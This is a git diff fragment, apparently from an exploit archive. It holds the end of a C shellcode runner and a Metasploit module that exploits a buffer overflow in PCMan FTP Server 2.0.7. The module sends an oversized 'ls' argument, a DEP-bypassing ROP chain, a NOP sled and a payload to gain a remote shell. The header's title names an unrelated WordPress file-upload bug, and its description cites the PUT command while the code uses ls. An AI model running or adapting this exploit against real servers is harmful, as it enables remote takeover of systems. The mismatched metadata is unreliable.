x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7"; + +main() +{ +printf("shellcode length %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/win64/remote/39999.rb b/platforms/win64/remote/39999.rb new file mode 100755 index 000000000..a22d3ac16 --- /dev/null +++ b/platforms/win64/remote/39999.rb @@ -0,0 +1,140 @@ +=begin +# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload +# Date: 22-06-2016 +# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z +# Exploit Author: quanyechavshuo +# Contact: quanyechavshuo@gmail.com +# Website: http://xinghuacai.github.io +# Category: ftp remote exploit + +1. Description +this is another bug of pcmanftp which can be used to get a remote shell,and fits well with win7x64 with dep open,refer from + https://www.exploit-db.com/exploits/39662/ + +use anonymous and any password to login the ftp remotely,then send a command "ls AAA...A"(9000),the pcmanftp will crashed,later,find the 2009-2012th "A" will replace the pcmanftp's retn address + +=end + +## + # This module requires Metasploit: http://metasploit.com/download + # Current source: https://github.com/rapid7/metasploit-framework + ## + + require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PCMAN FTP Server Buffer Overflow - ls Command', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in the PUT command of the + PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous + credientials are enabled. + }, + 'Author' => + [ + 'quanyechavshuo' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '39662'], + [ 'OSVDB', 'N/A'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0A\x0D", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'windows 7 x64 chinese', + { + #'Ret' => 0x77636aeb, #dont need ret here in win7 + 'Offset' => 2008 + } + ], + ], + 'DisclosureDate' => 'Aug 07 2015', + 'DefaultTarget' => 0)) + end + + def check + connect_login + disconnect + + if /220 PCMan's FTP Server 2\.0/ === banner + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def create_rop_chain() + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x77032c3b, # POP EAX # RETN [kernel32.dll] + 0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets + 0x73c112d0, # ptr to &VirtualProtect() [IAT OLEACC.dll] + 0x76bb4412, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSCTF.dll] + 0x76408d2a, # XCHG EAX,ESI # RETN [SHLWAPI.dll] + 0x76b607f0, # POP EBP # RETN [msvcrt.dll] + 0x74916f14, # & push esp # ret [RICHED20.dll] + 0x7368b031, # POP EAX # RETN [COMCTL32.dll] + 0xfffffaff, # Value to negate, will become 0x00000201 + 0x756c9a5c, # NEG EAX # RETN [SHELL32.dll] + 0x767088bd, # XCHG EAX,EBX # RETN [RPCRT4.dll] + 0x77031d7b, # POP EAX # RETN [kernel32.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x76cc4402, # NEG EAX # RETN [SHELL32.dll] + 0x76b4ad98, # XCHG EAX,EDX # RETN [SHELL32.dll] + 0x756b1cc1, # POP ECX # RETN [SHELL32.dll] + 0x7647c663, # &Writable location [USP10.dll] + 0x73756cf3, # POP EDI # RETN [COMCTL32.dll] + 0x76cc4404, # RETN (ROP NOP) [USER32.dll] + 0x76b3f5d4, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x7366e16f, # PUSHAD # RETN [COMCTL32.dll] + + ].flatten.pack("V*") + + return rop_gadgets + + end + + + def exploit + connect_login + + print_status('Generating payload...') + sploit = rand_text_alpha(target['Offset']) + + #tmp = sploit + #print_status(tmp) + sploit << create_rop_chain() + #sploit << make_nops(9) 这句产生的nop并非90 + sploit << "\x90"*30 + #sploit << "\x41"*30 + #sploit << "\xcc" + sploit << payload.encoded + + #tmp=sploit + tmp=make_nops(9) + print_status(tmp) + + send_cmd( ["ls", sploit], false ) + disconnect + end + + end +